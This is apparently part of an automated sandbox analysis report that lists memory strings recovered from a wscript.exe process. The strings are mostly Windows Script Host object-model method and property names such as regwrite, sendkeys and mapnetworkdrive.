Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %b-ti memstr_c8e67ba2-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshruntimelibrarywwmemstr_5b157160-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: itextstreamwmemstr_46c4c312-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: icolumnwwmemstr_b37e8453-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: icolumnww8memstr_0d37fbfc-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: atendofstreamwwwmemstr_750a0e4b-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: atendoflinewmemstr_723e376a-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rgcharacterswwmemstr_09e574aa-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: readlinememstr_b4da99e7-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ureadallwmemstr_2dd10f39-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .\writewwwmemstr_3dad83d1-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: writelinewwwmemstr_c0736d37-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: writeblanklineswmemstr_08283d01-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lineswwwmemstr_1cde30d8-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: skiplinememstr_cd8d9e64-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: closewwwmemstr_4cebc72a-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshshellwwwmemstr_fe6deb75-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshcollectionwwmemstr_38150d67-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zitemmemstr_5c3cd80c-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indexwwwmemstr_19aa60f9-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_valuewwwmemstr_8b282970-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0vcountwwwmemstr_01e7b010-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_countwwwmemstr_18429d42-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lengthwwmemstr_e3ae80fc-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xa_newenummemstr_e5825de6-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rout_enummemstr_6dbf87ab-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: specialfolderswwmemstr_3041f4e1-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <out_folderswmemstr_04e6f0da-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshenvironmentwmemstr_faba313e-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: removewwmemstr_82cc9e3f-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5environmentwmemstr_7da71d8d-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_envwmemstr_ded6b5a9-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]commandwmemstr_87fb101e-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xwindowstylewmemstr_48f21669-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: waitonreturnmemstr_c4992bde-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_exitcodememstr_9382a210-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: popupwwwmemstr_3c9725ce-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secondstowaitwwwmemstr_69cc9e05-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~titlewwwmemstr_22115192-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_buttonwwmemstr_7e7204e4-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vdcreateshortcutwwmemstr_b5beeef8-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pathlinkmemstr_33857c96-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_shortcutmemstr_fb1f4230-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cexpandenvironmentstringsmemstr_1402a71e-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_dstwmemstr_29566688-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regreadwmemstr_c34c78a4-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !>regwritememstr_9395699b-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kvaluewwwmemstr_4e8a3a76-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hregdeletewwwmemstr_afef1d9d-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshshell2wwmemstr_2884c8fe-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: logeventmemstr_b0c9dd51-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: messagewmemstr_60c00d68-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ftargetwwmemstr_10be3a12-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_successwmemstr_6f0ce9d4-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 26appactivatewmemstr_16a203bc-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tappwmemstr_1f2ee304-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sendkeysmemstr_84292593-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshshell3wwmemstr_91b3856b-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshexecmemstr_de69a345-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshexecstatuswwwmemstr_e07e3fd2-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __midl___midl_itf_iwshom_0001_0037_0001wmemstr_d9b2a71f-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshrunningwwmemstr_13106e46-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshfinishedwmemstr_b312e1e8-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wshfailedwwwmemstr_ee194cff-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +statuswwmemstr_d6106e19-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stdinwwwmemstr_96722c16-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: astdoutwwmemstr_7f0df9bc-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,stderrwwmemstr_b3d269b0-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %processidwwwmemstr_8fbee310-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o{exitcodememstr_9ddfc674-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ylterminatewwwmemstr_cc93604c-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ylterminatewwwmemstr_9f7c562b-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zyexecmemstr_70bae88c-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ppexecwwmemstr_f60ceb7a-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: currentdirectorymemstr_e194a691-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: btout_directorywwwmemstr_baf4d9b5-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2iwshshortcutmemstr_813a0835-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fullnamememstr_f100ef7d-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_fullnamememstr_2511a02e-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j}argumentswwwmemstr_0219752f-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j}argumentswwwmemstr_bd56cba6-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zout_argumentswwwmemstr_d281af47-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: descriptionwmemstr_a1df1573-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <out_descriptionwmemstr_6d111f1f-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hotkeywwmemstr_32453406-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_hotkeywwmemstr_6846f2e8-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: igiconlocationmemstr_544b524f-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nout_iconpathmemstr_a8ae40f9-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: relativepathmemstr_9d51be7a-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: targetpathwwmemstr_01deaf12-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_pathmemstr_c4c83d71-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bout_showcmdwmemstr_a18dd055-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: workingdirectorymemstr_1ae54b87-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y#out_workingdirectorymemstr_8ff71375-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshnetworkwmemstr_b84e03ee-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: userdomainwwmemstr_5ca102a7-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_userdomainwwmemstr_c4c419e5-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: usernamememstr_006624f8-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_usernamememstr_d572d65a-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: userprofilewmemstr_2c623899-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: out_userprofilewmemstr_6131f477-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wcomputernamememstr_97ace839-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tdout_computernamememstr_173eb09b-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eorganizationmemstr_b2943ce9-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aout_organizationmemstr_3dd893a8-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'out_sitememstr_5d32b42d-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mapnetworkdrivewmemstr_0f0ba1d6-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: alocalnamewwwmemstr_5eb8ca10-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: remotenamewwmemstr_4c20ce34-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: updateprofilewwwmemstr_30865c01-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: passwordmemstr_af2c3977-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: removenetworkdrivewwmemstr_7d898b59-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: forcewwwmemstr_fc5323a1-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: enumnetworkdriveswwwmemstr_9f461b0c-5
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: addprinterconnectionmemstr_4b702e64-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: removeprinterconnectionwmemstr_5bdb7f2f-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: enumprinterconnectionswwmemstr_8e44ed47-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: setdefaultprinterwwwmemstr_1725eeb3-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshnetwork2memstr_6e4ee161-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: addwindowsprinterconnectionwmemstr_ae711dc2-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x_printernamewmemstr_d72acf40-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: drivernamewwmemstr_70cb608b-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iwshurlshortcutwmemstr_c7aeed81-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: comparemethodwwwmemstr_8ff2a286-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cbinarycomparewwwmemstr_d172a5fd-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: textcomparewmemstr_02501459-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: databasecomparewmemstr_aa796999-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iomodewwmemstr_b4b23875-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8forreadingwwmemstr_8874a8f4-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0e9forwritingwwmemstr_6624ff35-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: forappendingmemstr_ffbaf1c9-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8@=tristatememstr_60b4bd9b-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: htristatetruememstr_18075ab8-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tristatefalsewwwmemstr_dc527921-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9tristateusedefaultwwmemstr_7bdf0bd5-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <tristatemixedwwwmemstr_3d367b3d-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fileattributewwwmemstr_7ff72cb6-9
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o__midl___midl_itf_iwshom_0000_0000_0001wmemstr_f4913ae9-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: normalwwmemstr_2511a96e-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 04<readonlymemstr_e14d469f-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hiddenwwmemstr_a3f4599c-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: systemwwmemstr_e092fc47-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: volumewwmemstr_db9960de-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0mgdirectorywwwmemstr_43dc495b-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: archivewmemstr_f8b36504-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aliaswwwmemstr_f16a86bd-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: compressedwwmemstr_eb48f01a-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: compressedwwmemstr_0cee49af-a
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ifilesystemwmemstr_44487db4-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: idrivecollectionmemstr_5682f971-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: idrivewwmemstr_601014e7-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dpbstrpathwwwmemstr_e8377611-6
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: driveletterwmemstr_028f9c59-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n<pbstrletterwmemstr_0eb2b5af-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gxsharenamewwwmemstr_8b8395ad-4
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gxsharenamewwwmemstr_cf7fe5c3-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pbstrsharenamewwmemstr_8b2d051f-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @drivetypeconstwwmemstr_7678f949-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o__midl___midl_itf_iwshom_0000_0000_0002wmemstr_727f0bb7-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: unknowntypewmemstr_8927f215-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: removablewwwmemstr_26c67fef-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fixedwwwmemstr_1ef6b0ca-d
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: remotewwmemstr_5d172a35-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cdromwwwmemstr_bd3870b9-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ramdiskwmemstr_e099cf66-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: drivetypewwwmemstr_fc2979e3-3
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }ifolderwmemstr_5e0d2efd-7
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pbstrnamewwwmemstr_c12ee36d-f
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shortpathwwwmemstr_4d910b0e-e
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rshortnamewwwmemstr_a906f599-c
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: drivewwwmemstr_9523cce3-b
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ppdrivewmemstr_5297a6a7-0
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7@parentfoldermemstr_f36cb4f4-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ppfoldermemstr_f61c5303-1
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: attributeswwmemstr_0285cc37-8
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: datecreatedwmemstr_02be5e36-2
Source: wscript.exe, 0000000B.00000002.2997082192.000001F1D0BFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pdatewwwmemstr_eb219bf8-7
